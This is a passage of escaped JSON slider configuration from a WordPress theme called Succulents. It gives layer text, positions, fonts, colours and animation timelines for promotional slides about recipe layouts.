To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true},\"timeline\":{\"speed\":1500,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":7490,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"image\"},\"2\":{\"text\":\"AMAZING LAYOUTS\",\"alias\":\"FOR WORDPRESS\",\"uid\":2,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"244px\",\"e\":true},\"n\":{\"v\":\"-422px\",\"e\":true},\"t\":{\"v\":\"4px\",\"e\":true},\"m\":{\"v\":\"6px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"154px\",\"e\":true},\"n\":{\"v\":\"-326px\",\"e\":true},\"t\":{\"v\":\"-364px\",\"e\":true},\"m\":{\"v\":\"-232px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":6,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8690,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\",\"e\":true},\"t\":{\"v\":\"#3c3c3c\",\"e\":true},\"m\":{\"v\":\"#3c3c3c\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"14px\",\"e\":true},\"n\":{\"v\":\"14px\",\"e\":true},\"t\":{\"v\":\"14px\",\"e\":true},\"m\":{\"v\":\"14px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"v\":\"3px\",\"e\":true},\"n\":{\"v\":\"3px\",\"e\":true},\"t\":{\"v\":\"3px\",\"e\":true},\"m\":{\"v\":\"3px\",\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\",\"e\":true},\"t\":{\"v\":\"#3c3c3c\",\"e\":true},\"m\":{\"v\":\"#3c3c3c\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"},\"3\":{\"text\":\"Recipes \",\"alias\":\"Recipes \",\"uid\":3,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"239px\",\"e\":true},\"n\":{\"v\":\"-392px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"66px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"204px\",\"e\":true},\"n\":{\"v\":\"-274px\",\"e\":true},\"t\":{\"v\":\"-319px\",\"e\":true},\"m\":{\"v\":\"110px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"e\":true}},\"zIndex\":7,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8690,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#444444\",\"e\":true},\"n\":{\"v\":\"#444444\",\"e\":true},\"t\":{\"v\":\"#444444\",\"e\":true},\"m\":{\"v\":\"#444444\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"Quicksand\",\"fontSize\":{\"d\":{\"v\":\"60px\",\"e\":true},\"n\":{\"v\":\"60px\",\"e\":true},\"t\":{\"v\":\"60px\",\"e\":true},\"m\":{\"v\":\"60px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\",\"e\":true},\"t\":{\"v\":\"700\",\"e\":true},\"m\":{\"v\":\"700\",\"e\":true}},\"letterSpacing\":{\"d\":{\"v\":\"1px\",\"e\":true},\"n\":{\"v\":\"1px\",\"e\":true},\"t\":{\"v\":\"1px\",\"e\":true},\"m\":{\"v\":\"1px\",\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#444444\",\"e\":true},\"n\":{\"v\":\"#444444\",\"e\":true},\"t\":{\"v\":\"#444444\",\"e\":true},\"m\":{\"v\":\"#444444\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"},\"4\":{\"text\":\"Succulents lets you present your amazing recipes in an appealing as well as practical manner with its recipe layouts. \",\"alias\":\"It is a long establi...\",\"uid\":4,\"size\":{\"width\":{\"d\":{\"v\":\"418px\",\"e\":true},\"n\":{\"v\":\"406px\",\"e\":true},\"t\":{\"v\":\"419px\",\"e\":true},\"m\":{\"v\":\"243px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"67px\",\"e\":true},\"n\":{\"v\":\"85px\",\"e\":true},\"t\":{\"v\":\"84px\",\"e\":true},\"m\":{\"e\":true}},\"originalWidth\":\"418px\",\"originalHeight\":\"67px\"},\"position\":{\"x\":{\"d\":{\"v\":\"243px\",\"e\":true},\"n\":{\"v\":\"-297px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"-371px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"266px\",\"e\":true},\"n\":{\"v\":\"-185px\",\"e\":true},\"t\":{\"v\":\"-228px\",\"e\":true},\"m\":{\"v\":\"81px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"e\":true}},\"zIndex\":8,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":8,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8690,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"19px\",\"e\":true},\"n\":{\"v\":\"19px\",\"e\":true},\"t\":{\"v\":\"19px\",\"e\":true},\"m\":{\"v\":\"16px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"v\":\"0px\",\"e\":true},\"n\":{\"v\":\"0px\",\"e\":true},\"t\":{\"v\":\"0px\",\"e\":true},\"m\":{\"v\":\"0px\",\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"27px\",\"e\":true},\"n\":{\"v\":\"27px\",\"e\":true},\"t\":{\"v\":\"27px\",\"e\":true},\"m\":{\"v\":\"22px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"text\"},\"5\":{\"text\":\"Recipe Single\",\"alias\":\"Reacents Post\",\"uid\":5,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"245px\",\"e\":true},\"n\":{\"v\":\"-428px\",\"e\":true},\"t\":{\"v\":\"-428px\"},\"m\":{\"v\":\"-428px\"}},\"y\":{\"d\":{\"v\":\"413px\",\"e\":true},\"n\":{\"v\":\"-66px\",\"e\":true},\"t\":{\"v\":\"-66px\"},\"m\":{\"v\":\"-66px\"}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"zIndex\":9,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":9,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8690,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\",\"e\":true},\"t\":{\"v\":\"#3c3c3c\"},\"m\":{\"v\":\"#3c3c3c\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[